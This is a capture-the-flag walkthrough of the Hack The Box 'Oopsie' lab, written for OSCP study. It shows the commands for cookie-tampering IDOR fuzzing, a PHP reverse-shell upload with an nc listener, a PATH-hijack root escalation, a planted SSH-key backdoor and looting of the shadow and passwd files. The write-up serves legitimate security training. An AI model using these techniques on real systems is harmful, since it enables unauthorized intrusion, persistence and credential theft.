Box 2: HTB - Oopsie
It is considered a “Very easy” Box on HTB but causes troubles for me.
Enumeration
As a routine, I use Nmap for port scanning and reconnaisance at the beginning. For explanation about nmap syntax and its parameter, visit this site: https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.28 --open
The nmap scanning result is very brief, not as my imagination. There’re only 2 opening ports for us to explore today: 22 (SSH
) and 80 (HTTP
)
PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
There’s not many things I can do here. I run Hydra tool for authentication brute-force with rockyou.txt
in the background, but unfortunately, it cannot find any thing. Meanwhile, I also run dirsearch
to enumerate web site directories for some interesting stuff. Additionallly, I navigate this site to inspect menu, tabs, and view page source…
dirsearch -u http://10.10.10.28 -e html,js,php,old,bakOptions:
-u URL, --url=URL : Target URL
-e EXTENSIONS, --extensions=EXTENSIONS : Extension list separated by commas (Example: php,asp)
dirsearch
can detect some directories in this site, but they’re inaccessible when I try to access them. Maybe it need us to authenticate & authorize. There is a login page, however, it redirects to homepage when I try.
In contrast, when navigating the page source, I find a weird directory: /cdn-cgi/login/script.js
This page has quite a bit of content. So you can start with filtering out the links to webpages and scripts with curl
as another way:
curl 10.10.10.28 | grep -E --colour 'href|script'
Fire it in your browser and the login page in front of your eyes right now!
What shall we do next? I had tried to brute-force it with Hydra tool but hopeless. Finally, I used Google-fu and found that the boxes in “HackTheBox” are related to each other. Let’s try reusing the admin password from the previously compromised machine, with common usernames such as administrator or admin. This is my first experience with that behaviour, use it with the later boxes!
Just as successful login, I access “Upload” tab firstly because I think this is normally an attack vector for creating reverse-shell connection. However, it’s not as easy as a piece of cake.
Back to “Account” tab, you will see some information about currently logged in acocunt. “Access ID” is 34322 but on the URL bar, we also notice the paramter “id” equals 1, which for our current admin user. I checked the cookies and found something interesting. The cookie “user” is 34322 too.
Wfuzz
I have id of 1 in the URL bar. If I change it to a '2', then I get nothing on the screen. It might be possible to brute force the id values, and display the user value for another user, such as super admin account. We can do this using wfuzz
. I’ll try fuzzing the “id” parameter from 0 to 100.
wfuzz -c -z range,0-100 --hh 3595 -b role=admin -b user=34322 -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
Options:
-c : Output with colors
-u url : Specify a URL for the request
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder]. A list of encoders can be used
-b cookie : Specify a cookie for the requests. Repeat option for various cookies
--hh : Don't show for a certain amount of characters in the response
Why did I use --hh 3595
in this command? Let’s try access URL again with “id” which equals '2'. This parameter value is invalid, then it will response with an empty page as below:
So with invalid “id”, the response pages will be the same and have the same character amount 3595
. We surely wanna ignore them and just keep focusing on the HTTP responses which have different content lengths and valid “id”. Let’s view the result from wfuzz
tool as below:
Notice: What is Fuzzing?
To keep it simple, fuzzing can be argued as “fancy bruteforcing” to some degree. However, you can fuzz what you can’t bruteforce. Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different username and passwords much quicker then a human can (and is willing to do…). For more information about wfuzz
tool, please kindly visit this. If you have problems when installing, check this for workaround. I hope it will be helpful.
BurpSuite
Another method to do above task is using BurpSuite Intruder. First of all, we will use Proxy mode to capture all traffic we sent to the web server and change browser settings to intercept them in Proxy mode. Then, we plan to send it to Intruder for attack.
Then, let’s move to “Payloads” tab to define value range that we’ll use in fuzzing. To create a list containing 0,1,..,100 value, you can utilize this one-liner command: for i in $(seq 0 100); do echo $i; done > list.txt
. “Load” this list into “Payloads Sets” and click “Attack”.
In the result windows, like we do with wfuzz
, you only need to focus on HTTP response which have different content lengths.
I’ve tried all in this list and with the value “id=30”, we will get the “super admin” AccessID.
Now, we can modify cookie “user” to 86575 in our web browser. After that, try accessing “Upload” tab again, this will be so amazing!!
Foodhold
In the next step, we will upload the reverse shell to this server and run it. If you’re using Kali Linux like me, a collection of webshells for PHP is available in /usr/share/webshells/
. You can check and list all of them with command:
tree /usr/share/webshells
I’ve picked up php-reverse-shell.php in this time. After changing the IP and port values, we upload the file, capture the request, substitute the user
value as before, and click Upload.
So that was a success, but now where did it go? Remind you of the dirsearch
step, we’ve found a directory called ''uploads''. Try 10.10.10.28/uploads and it gives a 301, yayy! Now, we can set up our listener and trigger a reverse shell.
sudo nc -lnvp <port number>
Use browser and move to your reverse-shell location, then ''Enter'' to run it!
http://10.10.10.28/uploads/<your revere-shell file name>.php
Current shell is not tty and quite inconvenient, let’s proceed to upgrade it. We can usewhich python
or which python3
to check whether python
orpython3
is available on this machine or not. Python3 is present in /bin/
so we will run below command to spawn a tty shell (interactive):
python3 -c 'import pty; pty.spawn("/bin/bash")'
Lateral Movement
In this stage, you can easily find the “user.txt” flag in /home/robert/
. I won’t disclose the flag content is this write-up, you should have enjoy it yourself. Next, it’s a good idea to navigate the web root directory /var/www/html
. I found some script files here and db.php
is one of them. I have credential of robert
for mysql, does that work elsewhere?
Yes, we still have another opening service port - SSH.
ssh robert@10.10.10.28
→ Enter → Provide the password
Privilege Escalation
Now that we are robert
, again, look around the home directory and see what we got. After looking through these files, we don’t find anything juicy. I considered using find
command to list all of interesting files that robert
have permission to access. After minutes of getting stuck, I used id
command and found robert
is a member of the weirdbugtracker
group.
So we can enumerate the filesystem to see if this weird group has any special access.
find / -type f -group bugtracker 2> /dev/null
The only file found is /usr/bin/bugtracker
, this executable file is suspicious and let’s inspect it. So I’ll look at the libraries using ldd but there is nothing exploitable there since I cant hijack those paths. After Google-fu, I run strings
to see if I can get an idea of what the program has hard-coded. I then run ltrace
to see exactly what the calls do. So far, this’s my first time with 2 these commands, I don’t have a lot of information or cheat about them therefore. Research them later, when possible!
strings
command explanation: https://www.lifewire.com/strings-linux-command-4093452
ltrace
command explanation: https://man7.org/linux/man-pages/man1/ltrace.1.html
Looking at the output, it looks like a system command is calling the cat
command and looking at the setuid
line, it is setting the UID as 0 which is root. We see that it calls the cat binary using this relative path instead of the absolute path. By creating a malicious cat and modifying the path to include the current working directory, we should be able to manipulate this misconfiguration, and escalate our privileges to root.
Let’s add the current working directory to PATH, create the malicious binary and make it executable.
export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
Finally, we can execute/usr/bin/bugtracker
to get root login. Remember that we changed path to runcat
command, so we need to use absolute path /bin/cat
to read the file content instead of the normal cat
. You will easily find the ''root.txt'' flag in /root/
. Let’s explore it by yourself.
I was afraid of losing this connection and consider setting up a backdoor, so I’ll create a basic ssh key (ssh-keygen
) and upload it to the authorized_keys
file for root. Now I can get in as root anytime. On your own machine, use ssh-keygen
command to generate key pair for SSH. So then, 2 key files are created: id_rsa
(private key) and id_rsa.pub
(public key). Try to copy the public key to authorized_keys
file on Victim machine (10.10.10.28) at SSH directory: ~/.ssh/
. Try connecting SSH from my Kali machine to this box with private key already created:
Call Google-sama and I found the reason for this. I’ve changed permission for this file with command: chmod 600 id_rsa
. Visit this for understanding file permission in Linux.
Now time to loot, so I pull all the shadow
and passwd
file for credentials. As my above experience, they may be useful for the next several boxes!
There is a file inside of the .config
directory that has some additional credentials. Based on the last box, I’ll add all these I found to my crendential file because password reuse may be a theme here!
Finally, this is also the 2nd box on my journey to pursue OSCP exam. I’ll try to complement the details much more when possible.
THANKS FOR READING AND SUPPORTING!